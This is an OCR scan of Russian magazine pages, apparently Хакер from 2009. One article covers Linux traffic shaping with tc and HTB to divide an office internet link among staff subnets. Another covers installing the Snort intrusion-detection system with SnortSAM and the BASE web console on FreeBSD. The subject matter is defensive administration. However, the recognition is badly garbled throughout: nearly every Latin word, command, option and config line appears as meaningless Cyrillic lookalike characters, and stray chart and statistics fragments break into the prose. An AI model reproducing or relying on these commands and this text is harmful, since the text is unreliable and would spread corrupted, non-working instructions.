наоборот, заметили, что могут качать торренты 
в рабочее время на очень внушительных скоро- 
стях. Говоря админским языком, в сети образо- 
вались заторы, вызванные теми, кто в тот момент 
активно ее использовал. Стомегабитный канал 
распределялся неравномерно между пользовате- 
лями, и каждый мог занять его весь. Остальным 
приходилось ждать. 

КРАТКИЙ СЦЕНАРИЙ Решение проблемы: раз 
деление канала между сотрудниками с ограничени- 
ем скорости ! Сеть будет функционировать на «5 + », 
если каждый сотрудник получит в распоряжение 
отдельный канал, скорость которого будет состав- 
лять 1 Мбит. Тогда отдельно взятый интернет-поль- 
зователь не сможет занять больше причитающейся 
ему доли и отобрать часть канала у других. С точки 
зрения компании, это еще и отличный способ эко- 
номии (после разделения канала оказывается, что 
его суммарная пропускная способность даже из- 
лишне высока) и ведения статистики по трафику 
для отдельно взятого сотрудника. 

Обычно для разделения канала с ограничением ско- 
рости используются возможности операционной 
системы 105, на которой функционирует сетевое 
оборудование Сізсо (дешевые решения от других 
производителей, таких, какБИпк, Тгепсіпеіи №і§еаг, 
вообще не обладают такой возможностью) . Однако 
особой необходимости тратить баснословные сум- 



мы на аппаратные шлюзы от Сізсо нет. Ядро Ііпих 
уже более пяти лет как содержит в себе код сложной 
и весьма функциональной подсистемы управления 
трафиком ТгаШс Сопітоі, которая по некоторым па- 
раметрамдаже обходит 105. 

ПОДСИСТЕМА ТКАРРІС С0ЫТК01. Подсисте 
ма ТгаШс Сошгоі поддерживает множество мето- 
дов классификации, приоритезации, разделения 
и ограничения трафика (как исходящего, так 
и входящего). Она очень гибка в настройке, но 
сложна в понимании. Поэтому мы уделим значи- 
тельную часть статьи теоретическому материалу 
и лишь затем приступим к решению задачи с по- 
мощью НТВ — одной из наиболее гибких и попу- 
лярных дисциплин ТгаШс Сошгоі. 
Подсистемауправления трафиком Ііпих позволя- 
ет делать следующее: 

• 5Ьаріп§. Шейпинг — ограничение трафика, за- 
держка пакетов с целью создания желаемой ско- 
рости передачи. Может использоваться не только 
для «сужения» исходящего канала, но и для сгла- 
живания бросков во время пиковых нагрузок. 

• 5сЬесІи1іп§. Планирование — упорядочивание 
типов трафика в канале. Позволяет избегать за- 
держек для критичных типов трафика ((^о5) . 

• Ро1ісіп§. Политика входящего трафика. Позво- 
ляет ограничить входящий трафик путем унич- 
тожения превысивших лимит пакетов. Помогает 
бороться с ПОо5. 

Отметим, что ограничение без потерь возможно 
только в отношении исходящего трафика. Стек 
протоколов ТСР/ІР не предусматривает возмож- 
ности заставить удаленную сторону слать пакеты 
медленнее (и это правильно) . 

В обработке трафика участвуют три ключевых 
сущности: дисциплины обработки пакетов, клас- 
сы и фильтры. Настройка эффективной системы 
ограничения трафика невозможна без понима- 
ния механизмов их работы, роли и связи друг с 



другом. Мы в подробностях рассмотрим каждую 
из них: 

• Дисциплина обработки пакетов ^сіізс) — оче- 
редь пакетов и закрепленный за ней алгоритм 
обработки. 

• Класс (сіазз) — логический контейнер, который 
может содержать несколько подклассов или дис- 
циплину. 

• Фильтр (Шіег) — механизм классификации тра- 
фика. 

В простейшем варианте путь пакета от приложе- 
ния до удаленного конца соединения выглядит 
так. Приложение генерирует (пользуясьуслугами 
библиотекиядра) сетевой пакет и отдает его ядру, 
которое помещает пакет в очередь РІРО (первым 
пришел, первым ушел). Драйвер сетевой карты 
время от времени обращается к специальному 
алгоритму ядра, который извлекает из очереди 
пакет и отдает его драйверу. Далее пакет уходит к 
адресату. Все просто. 

Ііпих действует таким же образом. Но формат 
представления очереди и алгоритм ее обработки, 
в совокупности называемые дисциплиной обра- 
ботки пакетов, в нем заменяемы! По умолчанию 
используется дисциплина рШоДазІ, реализующая 
очередь РІРО. Пользуясь утилитой Іс, админист- 
ратор может заменить ее на другую дисциплину, 
которая будет переупорядочивать пакеты (плани- 
рование), задерживать их на определенное время 
(шейпинг) или выполнять другие действия. 

ДИСЦИПЛИНЫ КЛАССОВ ТгаШс Сошгоі не 
был бы столь гибким, если бы не позволял раз- 
бивать трафик на классы с помощью классовой 
дисциплины и набора ее подклассов. Схемати- 
чески классовая дисциплина очень похожа на 
файловую систему, с тем лишь исключением, 
что ее корень или классы (каталоги) могут 
содержать либо дисциплину (файл), либо под- 
классы (подкаталоги) . Одно из двух. Классовые 
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дисциплины и классы предназначены для построения дерева выбора. 
Сначала весь трафик разбивается на несколько общих классов (напри- 
мер, трафик до Отдела-1, трафик до специализированных внутренних 
серверов и т.д.), а затем каждый из них разбивается на несколько под- 
классов (например, трафик до БЫЗ-сервера Отдела-1), за которыми 
уже могут быть закреплены дисциплины. Чтобы управлять тем, дис- 
циплиной какого класса будет обработан определенный тип трафика, 
классовые дисциплины позволяют подключать к себе фильтры. Это дает 
возможность «завернуть» определенный трафик в один из ее подклассов. 
Фильтры используют классификаторы для идентификации пакетов нуж- 
ного типа и как бы говорят ядру: «Этот вид трафика должен обрабаты- 
ваться с помощью дисциплины вот этого класса». Существует несколь- 
ко разных классификаторов. Самыми популярными являются и32 и й/ѵ. 
Первый позволяет выделять пакеты по исходящим адресам и адресам 
назначения, портам, парам «хост: порт», типам протокола и типу сервиса. 
Второй классифицирует пакеты путем чтения маркировок, записанных 
брандмауэром іріаЫез/пеШкег (цель МАКК) . За каждым сетевым интер- 
фейсом должны быть закреплены две особые дисциплины: корневая 
дисциплина (гоо! ^с^І5с) и входящая дисциплина (іп^гезз ^с1І5с) . В пер- 



вую помещается весь исходящий трафик (по умолчанию используется 
дисциплина рй1о_1а5і:) . Во вторую — входящий. 

Для идентификации дисциплин и классов используются дескрипторы. Они 
состоят из старшего и младшего номеров. Первый — это произвольное чис- 
ло, однако все классы, имеющие общего родителя, должны иметь одинако- 
вый старший номер. Младший номер используется либо для произвольной 
идентификации классов, либо для указания на то, что объект является дис- 
циплиной (номер 0). Специальный дескриптор ШТ:0 зарезервирован для 
входящей дисциплины. 

УТИЛИТА ТС Для конфигурирования подсистемы управления трафиком 
предназначена утилита !с из пакета іргои!е2. Она принимает набор команд в 
качестве аргументов, с помощью которых можно создавать классы, привязы- 
вать кним дисциплины и добавлять фильтры. Синтаксис ее похожна синтаксис 
команды ірКѵиз операционной системы РгееВЗБ, такчто знакомые с ним быст- 
ро освоятся. Для примера рассмотрим простейший вариант использования: 

# Ыс дсіізс асісі сіеѵ еСйО гооЫ ЫЫ: гаке 256кЬіС \ 

Іакепсу 50тз Ъигзк 1540 



НАИБОЛЕЕ ИСПОЛЬЗУЕМЫЕ ДИСЦИПЛИНЫ 

рйГо — Простейшая очередь ЕІЕО (первым пришел, первым ушел) . Размер буфера задается в пакетах. 

ЪШо — Аналог ріііо с буфером, размер которого задается в байтах. 

рШо_Саз1: — Реализует простую очередь РІРО с тремя полосами. Используется по умолчанию в качестве корневой и не принимает аргументов. 
ІЫ — Токеп Виске! Рікег (ТВР) . Передает поступающие пакеты со скоростью, не превышающей заданный порог. Простая и точная реализа- 
ция делает ее идеальным решением для ограничения полосы пропускания всего интерфейса. 

з&і — ЗіосЬазііс Раігпезз Оиеиеіп^ (5Р(2) . Реализация алгоритма справедливой очередизации. Поровну разделяет полосу пропускания меж- 
ду несколькими соединениями. Эффективно работает только на загруженном интерфейсе. 

гесі — Капбот Еагіу Пеіесііоп (КЕБ) . Симуляция затора. Отбрасывает пакеты случайным образом при достижении заданной полосы пропус- 
кания. Хорошо подходит для ограничения прожорливых в плане трафика приложений. 

ргіо — Разделяет трафик по приоритетам (поле Т05) . По умолчанию создает три класса, в первый из которых попадают пакеты с большим 
приоритетом, а в третий — с наименьшим. 

сЪ^ — Сіазз Вазеб Оиеиеіп§ (СВ(2) . Классовая дисциплина, предназначенная для создания сложных систем управления трафиком. Поддер- 
живает ограничения и приоритеты. 

ЫЬ — НіегагсЫсаІ Токеп Виске! (НТВ) . Предназначена для разделения полосы пропускания между различными видами трафика на полосы 
заданной ширины, с возможностью заимствования. Поддерживает приоритеты. 



ХАКЕР 07 /127/ 09 



► 123 





» ЗѴЫ/АСК 




5 ^ 5 ^ 3 ^ 5 ^ 5 ^ 

зід ІЫ ІЫ 



ДЕРЕВОДИСЦИПЛИН РАЗБИЕНИЕ ТРАФИКА 

ПОСЛЕ НАСТРОЙКИ ПО КАНАЛАМ-ПОДСЕ- 

ТЯМ 

Эта команда устанавливает ограничение для всего исходящего трафика в 
256 Кбит/с. Разберем подробнее все аргументы нс: 

• ^с1І5С асИ — добавляем новую дисциплину (для удаления используй сіеі) . 

• беѵепЬО — указываем устройство, ккоторому будет привязана дисциплина. 

• гооп — наша дисциплина корневая (будет обрабатываться весь трафик). 

• іЫ — имя дисциплины. 

• гапе 256кЫн ІаНепсу 50тз Ъигзі: 1540 — параметры, специфичные для дан- 
ной дисциплины: гапе — ограничение скорости, ІаНепсу — максимальный 
«возраст» пакета в очереди, Ьигзі: — размер буфера. 

Проще говоря, команда подключает дисциплину 1Ы в качестве корневой 
на интерфейсе епЬО и задает ей несколько параметров. Токеп Вискеп Рікег 
(ТВР) — это бесклассовая дисциплина, которая передает поступающие па- 
кеты с заданной скоростью. Способ указания скоростей и других величин 
в утилите тс несколько отличается от общепринятого, поэтому следующую 
табличку придется запомнить : 

Форматуказания скорости в утилите Іс 

тЪрз = 1024 кЪрз = 1024 * 1024 Ърз => Байт/с 

тЪіб = 1024 кЪіб => Кбит/с 

тЬ = 1024 кЪ = 1024 * 1024 Ь => Байт 

Заменить стандартную корневую дисциплину на любую бесклассовую 
совсем несложно, но на таком коне далеко не уедешь. Для создания раз- 
ветвленной системы управления трафиком нужны классовые дисцип- 
лины, классы, фильтры и целое дерево дисциплин. Чтобы настроить все 
это, может понадобиться не один десяток команд. Рассмотрим несколь- 
ко вводных примеров, перед тем как перейти к обсуждению дисциплины 
НТВ. 

ПРИМЕР ДЕРЕВА ДИСЦИПЛИН Классовая дисциплина ргіо предна- 
значена для классификации трафика с помощью фильтров или приори- 
тезации. По умолчанию ргіо содержит три класса, в каждом из которых 
находится обычная дисциплина РІРО. Когда сетевая карта обращается за 
очередным пакетом, проверяется класс :1. Если он не содержит пакетов, 
проверяется класс : 2 и только в последнюю очередь — : 3 . Получается, что 
пакеты класса :1 получают наивысший приоритет, а :3 — наименьший. 
Решение о том, в какой класс направить трафик, дисциплина ргіо прини- 
мает на основе поля Т05 сетевого пакета. Подключим дисциплину ргіо в 
качестве корневой и назначим ей имя (дескриптор) «1:0»: 

# бс дсіізс асісі сіеѵ ебЬО гооб ЬапсПе 1 : 0 ргіо 

Результат этой команды: дисциплина ргіо, подключенная в качестве корня, 
и три класса (1 : 1, 1 :2 и 1 :3) внутри нее, к каждому из которых подключена 
дисциплина РІРО. Мы вольны заменить любую из дисциплин, подключен- 
ных к классам, чем и воспользуемся для подключения дисциплины 5Іц с де- 
скриптором « 10 : 0» к классу «1:1»: 




ТАК БУДЕТ ВЫГЛЯДЕТЬ НАШАСЕТЬ 

# бс дсіізс асісі сіеѵ ебЬО рагепб 1:1 Ьапсііе 10:0 збд 

Это обеспечит справедливое разделение канала между интерактивными 
приложениями (они имеют наивысший приоритет) . Чтобы остальные при- 
ложения, такие как менеджеры закачек и ШггеШ-клиенты (которые обычно 
шлют пакеты с меньшим приоритетом в поле Т05) , не мешали интерактив- 
ным, ограничим для них скорость: 

# бс дсіізс асісі сіеѵ ебЬО рагепб 1:2 Ьапсііе 20:0 бЬб \ 

габе 512кЬіб Ьиббег 3200 Іітіб 3000 

# бс дсіізс асісі сіеѵ ебЬО рагепб 1:3 Ьапсііе 30:0 бЬб \ 

габе 25бкЬіб Ьиббег 6400 Іітіб 3000 

Такая схема будет плохо работать в реальной жизни, но для примера вполне 
годится. 

Теперь сделаем так, чтобы весь 55Н-трафик имел наивысший приоритет. 
Для этого закрепим за корневой дисциплиной ргіо фильтр, который будет 
перенаправлять пакеты с портом назначения 22 в дисциплину класса «1:1». 

# бс біібег асісі сіеѵ ебЬО рагепб 1:0 ргобосоі ір ргіо 1 \ 

и32 шабсЬ ір Ьрогб 22 Охбббб біомісі 1:1 

Рассмотрим подробнее механизм подключения фильтров: 

• Шбег асісі — Добавляем фильтр. 

• беѵеіІіО — Указываем устройство. 

• рагеш 1:0 — Дескриптор родителя. 

• ргоіосоі ір — Протокол, с которым будет работать фильтр. 

• ргіо 1 — Присваиваем классифицированному трафику приоритет 1 (на- 
ивысший). 

• и32 — Используемый классификатор. 

• та Іей ір брогі 22 0x1111 — Параметры классификатора. В данном случае 
указание отбирать пакеты с портом назначения 22. 

• Поѵѵісі 1:1 — Отфильтрованные пакеты должны иметь класс «1 : 1» и обра- 
батываться с помощью его дисциплины. 

Это все. Мы получили разветвленную систему управления трафиком, вы- 
полнив всего пять команд. 

КЛАССОВАЯ ДИСЦИПЛИНА НТВ Еще в первый релиз системы Тгаіііс 
Сотгоі была включена классовая дисциплина СВ(2 (СІазз-ВазесІ (Діеие), 
предназначенная для реализации сложных систем управления и ограни- 
чения трафика. СВ(2 завоевала большую популярность благодаря своей 
гибкости, но была очень сложна, запутана и обладала рядом ограниче- 
ний (тут и необходимость заранее указывать максимальную пропускную 
способность канала, и неэффективный алгоритм шейпинга). Поэтому в 
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# *с -5 -<1 с1а$$ 5Ь<т гіеѵ еНіО 

с 1 35$ ЫЬ 1:1 гоог ргіо 0 гаге 800КЫГ сеіі 800КЫГ Ьигя 2кЬ/8 шри ОЬ 
сЬиг5Г 2КЬ/8 ври ОЬ яиапгив 10240 Іеѵеі 3 
бепі 5914000 ЬуГез 11828 ркг* (сігорресі 0, оѵегіівігз 0) 
гаіе 70196Ьр5 141рр5 
Іепсіесі: 6872 Ьогго*е<1: 0 діапІ$: О 

с1а55 Ь*Ь 1:2 рагепі 1:1 ргіо 0 гаге 320КМГ сеіі 4000КЫЧ Ьигхі: 2кЬ/8 три ОЬ 
сЬигзі 2кЬ/8 ври ОЬ циапіив 4096 Іеѵеі 2 
беп* 5914000 Ьуіез 11828 ркіз (сігорресі 0. оѵегІівіГі 0) 
гаге 70196Ьр5 141рр$ 

Іелгіегі: 1017 Ьоггомѵед: 6872 діапі$: О 

с1а$$ Ь*Ь 1:10 рагепг 1:2 1еа( 20: ргіо 1 гасе 224кЫг сеіі 800кЫг Ьигзі 2кЬ/8 три ОЬ 
сЪига* 2кЬ/8 ври ОЬ яиапіит 2867 Іеѵеі О 
бел* 2269000 Ьуге5 4538 ркГ5 (ЬгорреЬ 4400, оѵегіівіг* 36358) 
гаіе 14635Ьр$ 29рр$ 

ТйпНргГ 7019 ЬпггпшсхЬ 1599 підгтГч - О 

ПРОСМОТРСТАТИСТИКИНТВВТС 

скором времени появилась более эффективная и простая в использова- 
нии альтернатива под названием НТВ (НіегагсЫсаІ Токеп Вискеи). Клас- 
совая дисциплина НТВ предназначена для разделения полосы пропус- 
кания между различными видами трафика, каждому из которых может 
быть предоставлена полоса гарантированной ширины. Она не обладает 
гибкостью СВ(2, но более проста в настройке и лишена ее недостатков. 
Именно на НТВ сегодня принято строить сложные и эффективные систе- 
мы ограничения трафика. 

Рассмотрим применение НТВ на примере, представленном в начале ста- 
тьи, но более усложненном. Допустим, у нас есть шлюз на Ііпих, интер- 
фейс егііі которого смотрит наружу, а егііО — во внутреннюю сеть. Ши- 
рина канала — 100 Мбит. Задача: разделить канал между сотрудниками 
компании так, чтобы директор и сотрудники ІТ-отдела могли выходить 
в интернет без скоростных ограничений, маркетологи получили огра- 
ничение в 2 Мбит/с каждый, менеджеры — 1 Мбит/с, секретари — 512 
Кбит/с, а все остальные — 256 Кбит/с. 

Есть два варианта решения. Первый: составить огромную таблицу ІР-ад- 
ресов и создать специальные правила ограничений для каждого адреса 
(с точки зрения системы НТВ это будет выглядеть как огромный набор 
классов и фильтров, по одному на каждый адрес). Второй: разбить всех 
потребителей канала на мета-группы, каждую из которых выделить в 
отдельную подсеть (директор и ІТ-отдел — 172.16.1.0, маркетологи — 
172.16.2.0, менеджеры — 172.16.3.0, секретари — 172.16.4.0, остальные 
— 172.16.5.0). Для каждой подсети назначить суммарное для всех ее чле- 
нов ограничение со справедливым разделением канала. Мы же создадим 
симбиоз этих двух систем, когда трафик сначала будет разбиваться на 
подклассы, соответствующие подсетям, а уже потом на отдельные классы 
для каждого пользователя. 

Для начала создадим работоспособную систему, основанную только на 
втором варианте решения задачи. Подключим дисциплину НТВ в качестве 
корневой: 

# іс дсіізс асісі сіеѵ еіЬ.0 гоок ЬапсПе 1: ЫЬ сіеіаиііі 15 

Опция «беіаик 15» говорит о том, что весь неклассифицированный филь- 
трами трафик должен быть обработан с помощью дисциплин класса «1:15». 
Создадим корневой класс, под который будет попадать весь трафик (это 
нужно для реализации заимствования) : 

# іс сіазз асісі сіеѵ еіЬО рагепк 1: сіаззісі 1:1 ЬіЬ \ 

гаке ІООтЬрз сеіі ІООтЬрз 

Создадим в нем пять подклассов для пяти наших подсетей. Директору и 
ІТ-отделу выделим 30-мегабитный канал с возможностью его расширения 
(заимствования) вплоть до 100 Мбит в случаях, когда остальные каналы не 
заняты: 

# кс сіазз асісі сіеѵ екЬО рагепк 1:1 сіаззісі 1:11 \ 

ЬкЬ гаке ЗОшЬрз сеіі ІООтЬрз 

Для маркетологов выделим 20-мегабитный канал: 

# кс сіазз асісі сіеѵ екЬО рагепк 1:1 сіаззісі 1:12 \ 



ЬкЬ гаке 2 0тЬрз 

Менеджерам — 10 Мбит/с: 

# кс сіазз асісі сіеѵ екЬО рагепк 1:1 сіаззісі 1:13 ЬкЬ гаке 
ЮтЬрз 

Секретарям — 5 Мбит/с: 

# кс сіазз асісі сіеѵ екЬО рагепк 1:1 сіаззісі 1:14 ЬкЬ гаке 
БтЬрз 

И — 40 Мбит/с на всех остальных: 

# кс сіазз асісі сіеѵ екЬО рагепк 1:1 сіаззісі 1:15 ЬкЬ гаке 
40шЬрз 

По умолчанию к вновь созданным классам подключены дисциплины, ре- 
ализующие очередь РІРО. Это нам не подходит. Чтобы канал равномерно 
распределялся между всеми участниками подсети, мы должны подключить 
к ним дисциплину 5&р 

# кс дсіізс асісі сіеѵ екЬО рагепк 1 : 11 ЬапсПе 10 : 0 зкд регкигЬ 10 

# кс дсіізс асісі сіеѵ екЬ.0 рагепк 1 : 12 ЬапсПе 20:0 зкд регкигЬ 10 

# кс дсіізс асісі сіеѵ екЬО рагепк 1 : 13 ЬапсПе 30:0 зкд регіигЬ 10 

# кс дсіізс асісі сіеѵ екЪ.0 рагепк 1 : 14 ЬапсПе 40:0 зкд регіигЬ 10 

# кс дсіізс асісі сіеѵ екЪ.0 рагепк 1 : 15 ЬапсПе 50:0 зкд регіигЬ 10 

Теперь подключим фильтры, которые будут классифицировать трафик: 

# кс кіікег асісі сіеѵ еіЬО ргокосоі ір рагепк 1:0 ргіо 1 \ 

и32 таксЪ. ір зге 172.16.1.0/24 кІоѵИсі 1:11 

# кс кіікег асісі сіеѵ еіЬО ргокосоі ір рагепк 1:0 ргіо 1 \ 

и32 таісЬ ір зге 172.16.2.0/24 кіоѵліеі 1:12 

# кс кіікег асісі сіеѵ еіЬО ргокосоі ір рагепк 1:0 ргіо 1 \ 

и32 таксЬ. ір зге 172.16.3.0/24 кіочліеі 1:13 

# кс кіікег асісі сіеѵ еіЬО ргокосоі ір рагепк 1:0 ргіо 1 \ 

и32 таісЬ ір зге 172.16.4.0/24 кіочліеі 1:14 

Для «всех остальных» фильтр не нужен, потому как мы уже указали дефолто- 
вый класс неклассифицированного трафика. 

Все, система будет работать, но не обеспечит жесткого ограничения для 
каждого пользователя (если, например, в определенный момент времени 
интернетом будет пользоваться только один менеджер, ему достанутся все 
10 Мбит, отведенные для всех менеджеров) . 

Жесткое ограничение можно реализовать, если вместо дисциплин подклю- 
чить к классам другие классы НТВ, по одному на каждого пользователя, и со- 
здать соответствующие фильтры. 

Для примера, установим ограничение в 256 Кбит/с для пользователя, нахо- 
дящегося в подсети «все остальные». Сначала добавим к «классу-подсети» 
новый «класс-пользователь»: 

# кс сіазз асісі сіеѵ екЬО рагепк 1:15 сіаззісі 1:150 \ 

ЬкЬ гаке 2 56кЬрз 
А затем фильтр: 

# кс кіікег асісі сіеѵ екЬО ргокосоі ір рагепк 1:15 ргіо 1 \ 

и32 таксЬ ір зге 172.16.1.32 кІоѵИсІ 1:150 

Подключать к классу дисциплину нет необходимости, так как по умолча- 
нию к нему уже подключена дисциплина РІР О . Подобные команды придет- 
ся выполнить в отношении каждого пользователя, не забывая давать им 
уникальные дескрипторы класса. 

При желании все это нетрудно упаковать в простой скрипт, который будет 
проходить по списку ІР-адресов и выполнять связку команд для каждого 
адреса . т 
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Довѣрься 

ищеике 

Прикручиваем кБпогІ систему блокировки атак 
БпогІБАМ и веб-консоль ВАБЕ 

Ежесекундно по интернет-каналу корпоративной сети проходяттысячи 
пакетов. Часть из них нацелена на то, чтобы обойти все заслоны и на- 
рушить работу сетевых сервисов или предоставить их автору базу для 
рассылки спама. И здесь на помощь администратору приходятсистемы 
обнаружения атак, позволяющие вовремя среагировать на угрозу. 



Наиболее популярной ОрепЗоигсе системой ИГО 5 
(Ыегѵѵогк ІШтизіоп ЭеГесгіоп ЗузГет) и системой 
предотвращения вторжений (ІШтизіоп Ргеѵепгіоп 
Зузіет) является Зпогі (ѵѵѵѵѵѵ. зпогі:. ог: ) . Это мощ- 
ный инструмент, способный обнаруживать и бло- 
кировать атаки (с помощью внешних программ 
вроде ЗпоггЗАМ) . Принцип работы ЗпоіТ доволь- 
но прост: все пакеты захватываются снифером, 
затем анализируется их содержимое, и при сов- 
падении с правилами выдается предупреждение. 
Распознаются некоторые методы сканирования, 
попытки определить ОС и использовать в ней 
уязвимости, сетевые атаки, наличие вирусов в 
файлах и т.д. Вся информация протоколируется 
и записывается либо в файлах журналов разно- 
го формата (обычный текстовый АЗ СП или би- 
нарный Гсрсіитр-формат) , либо в СУБД (МуЗС^Б, 
Розі^геЗС^Б). Система с установленной Зпогі 
обычно ставится «на входе» сети (например, в 
демилитаризованной зоне). Для максимальной 
эффективности возможно использование допол- 
нительных сенсоров на других системах. 

УСТАНОВКА БЫОКТ Итак, после небольшого 
вступления рассмотрим процесс установки Зпогі: 
с плагином ЗпогіЗАМ на РгееВЗЭ 7.x. Для нагляд- 
ного анализа собранной информации будем 
использовать веб-консоль ВАЗЕ. Первым делом 
обновляем порты: 

# рогбзпар ІебсЬ. 

# рогбзпар ирбаке 

Устанавливаем Зпогі:, подключив поддержку 
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МуЗС^Б и плагина ЗпогіЗАМ: 

# ссі /изг/рогбз/зесигіку/зпогк 

# таке -ШІТН_МУ30Ь -ШІТН_ЗШКТЗАМ 

# таке іпзкаіі 

При сборке без параметров просто отмечаем нуж- 
ные флажки. Как и большинство портов, все фай- 
лы конфигурации Зпогі: располагает в каталоге / 
изг/іосаі/еіс и скрипт запуска — в /изг/іосаі/еіс/ 
гс.сБ Конфигурационный файл зпоП.сопГ нахо- 
дится в подкаталоге /изг/іосаі/еіс/зпогі вместе 
с некоторыми другими файлами. Чтобы сэконо- 
мить журнальное место, остановимся только на 
основных настройках зпогі.сопЕ 

# ее /изг/ІосаІ/еІс/зпогІ/зпогБсопІ 

; Указываем диапазон адресов внутрен- 
ней сети (как вариант, можно использо- 
вать имя интерфейса) 
ѵаг НОМЕ_ЖТ 192 . 168 . 1 . 0/24 
; Задаем внешние адреса 
ѵаг ЕХТЕШАЪ_ШТ ! $НОМЕ_ЫЕТ 
; Для наиболее полной функциональности 
ЗпогД рекомендуется определить ІР-ад- 
реса специфических сервисов . В файле 
найдешь ряд готовых шаблонов , доста- 
точно проставить нужные адреса 
ѵаг БЕ8_ЗЕКѴЕКЗ 192.168.1.1 
ѵаг ЗМТР_ЗЕКѴЕКЗ 192.168.1.2 
; Теперь указываем порты для опреде- 
ленных сервисов (в данном случае НТТР) , 
чтобы Зпогб подходил к анализу более 
из бирате льно 



рогбѵаг НТТР_РОКТЗ [80,8000:8080] 
рогбѵаг ЗНЕЕЬСОБЕ-РОКТЗ I 80 
; Выполняем журналирование событий 
посредством Зузіод 

оибриб а1егк_зуз1од: БОО_АОТН ЬОС_ 

АЬЕКТ 

Далее в файле описываются правила (гиіез), кото- 
рые будет использовать Зпогі: при анализе трафи- 
ка. По умолчанию каталог с правилами находит- 
ся в /изг/іосаі/еіс/зпоп/гиіез, но если оставить 
запись по умолчанию «ѵаг ШБЕ_РАТН ./гиіез», 
то получим ошибку о невозможности открытия 
файла Іосаі.гиіез. Исправляем на «ѵаг КЦБЕ_РАТН 
гиіез». Кстати, никто не мешает указать и полный 
путь к каталогу. Файлы с описаниями правил под- 
ключаются в секции «Згер #6: Сизіотіге уоиг гиіе 
вег», расположенной в самом конце зпогі:. сопЕ 

іпсіибе $КІІЬЕ_РАТН/1оса1 . гиіез 
іпсіибе $ШЕЕ_РАТН/Ьаб-бга11іс . гиіез 
# іпсіибе $ВДЕЕ_РАТН/ехрегітепба1 . 
гиіез 

Названия правил говорят сами за себя. Файл 
Іосаі. гиіез предназначен для создания рулесетов 
пользователем, поэтому изначально он пуст. Ос- 
тавляй то, что действительно нужно, а остальное 
отключай, установив знак комментария перед 
именем. Самих правил в гиіез пока нет. Начиная 
с5поп2.4.0 (2005 год), они распространяются от- 
дельно. Для их получения требуется регистрация 
на зпогі. ог§, после которой ты получишь специ- 
альный ОіпкСосІе, предназначенный для загруз- 
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СОМРАЫУ 

ЫЕТѴѴОВК 




ЗІЧОРТ ЗЕІЧЗОР 



ки правил. Исключение составляют лишь СоттипіГу гиіез. Они лежат в сво- 
бодном доступе. Правила можно устанавливать вручную, просто скачав и 
распаковав в каталог гиіез, и затем самостоятельно следить за их обновлени- 
ем. Так, если ты внесешь в правило изменения, при следующем обновлении 
оно будетутеряно. Лучше использовать Регі-скрипт Оіпктазіег Готктазгег. 
зЕпеЕ) , он будет производить все операции по обновлению. Ставим: 

# ссі /изг/рогкз/зесигіку/оіпктазкег 

# таке іпзкаіі сіеап 

По умолчанию ОіпктазГег ищет свой конфиг оіпктазгег.сопб 



сначала в каталоге /еіс, а затем — в /шг/іосаі/егс. 

В РгееВЗБ уже есть готовый шаблон, переименовываем его и правим: 

# ср -ѵ /изг/іосаі/екс/оіпктазкег.сопі: . затріе 
/изг/іосаі/екс/оіпктазкег . сопі: 

Йее/изг/іосаі/еіс/оіпктазіег.соп^ 

; Снимаем комментарий со строки и заменяем параметр <оіпксос1е> 
своим значением, полученным с сайта зпогк . огд 
шгі = Ъккр: зпогк . огд/риЪ-Ъіп/оіпктазкег . сді/ 
<оіпксос1е>/ зпогкгиІез-зпарзкок-СІІККЕЫТ . Раг . дт, 



Воздвигнуть Ю5/ІР5 на бюджетном железе, используя только 
свободно доступные компоненты, вполне возможно. И работать 
такая защита будет ничуть не хуже, чем программные комплексы, за 
которые невменяемые разработчики просят десятки тысяч долларов 
и которые работают под вредоносными операционными системами, 
требующими кучу памяти и отжирающими уйму процессорныхтактов. 
Начнем стого, что Ю5/ІР5 вовсе не одно и то же — хотя их частень- 
ко путают, чему весьма способствуют гибридные варианты (они 
представляют собой Ю5, которая реализует некоторое подмножество 
функционала, формально являющегося прерогативой ІР5]. «Чистые» 
Ю5 в природе практически не встречаются (поскольку атаку необхо- 
димо нетолько распознать, но и блокировать, чем и занимаются ІР5]. 

В некоторых случаях ІР5 опирается на Ю5, например, анализирует се- 
тевой трафик на предмет наличия известных сигнатур, блокируя «не- 
хорошие» ТСР-па кеты, а то и вовсе работает на уровне приложений. 
Однако это не единственный вариант. Ряд атак удается блокировать 
безо всякой детекции. В частности, «нормализаторы» (отанглийского 
погтаііге) регенерируюттрафик, работая по принципу прокси-серве- 
ров. Они «выхватывают» из па кето в толь ко те поля, которые понима- 
ют, преобразуя их в «канонический» вид. В результате, хакер уже не 
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может послать жертве неожиданный запрос, вызывающий рвотный 
рефлекс. Естественно, такой подход незащищаетотошибокпере- 
полнения, ведь с его точки зрения «взрывпакеты» выглядят вполне 
легитимно — такчто, без детекции не обойтись. 

И тут мы приходим к проблеме ложных позитивных срабатываний. 

1 05 обнаруживает атаку там, где она и не ночевала, отклоняя запрос 
пользователя. Это не есть хорошо! А ІР5, установленная на «паро- 
ноидальный»уровень, сама по себе является нехилым источником 
ОоЭ-атак. Пользователи матерятся так, чтохвостувядает. Поэтому 
ІР5 обычно настраивается на довольно грубый уровень, допускаю- 
щий блокировку только явных атак. Какое количество атак при этом 
остается незамеченным — приходится только гадать. В этом смысле 
Ю5 намного перспективнее, поскольку даже на самом чувствитель- 
номуровнеложные позитивные срабатывания не приносятникакого 
ущерба, ограничиваясь новой записью в логе. Естественно, когда 
ложныхсрабатываний становится ОЧЕНЬ много, админ просто пе- 
рестает обращать на них внимание, и это проблема не админа, а Ю5. 
Ну, невозможно досконально расследовать каждую тревогу, если они 
сыплются косяками. 

КрисКасперски 
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УСТАНАВЛИВАЯ ВАЗЕ, СЛЕДУЕТ ВЫБРАТЬ 
ПОДДЕРЖКУ МѴ5СИ. 




НТТР://ѴѴѴѴѴѴ 



— "і — Г 

> Ііпкз 

Сайты проектов: 

• ЕгееВЗЭ — ѵѵѵѵѵѵ. 
ігееЬзсІ.огд/ги . 

• 5пог1 — зпогбогд . 

• Оіпктазіег — 
оіпктазіег.зЕпеб 
• ВА5Е — 
зесигеісІеаг.пеЕ 
зі.пеіі/ріюіесііз/ 
зесигеісіеаз . 

• Зпогізапп — ѵѵѵѵѵ. 
зпогізат.пеб 




> СІѴСІ 

На дискеты найдешь 
видеоролик, в кото- 
ром показано, как 
установить систему 
обнаружения атак 
5погі на ЕгееВЗЭ 
7, перенаправить 
вывод данных в базу 
Му5СН_ и добавить 
веб-интерфейс ВА5Е. 



; Соттипібу гиіез скачиваются без оіпксобе 
игі = кббр : //шт. зпогб . огд/риЪ-Ьіп/бошіІоабз . 
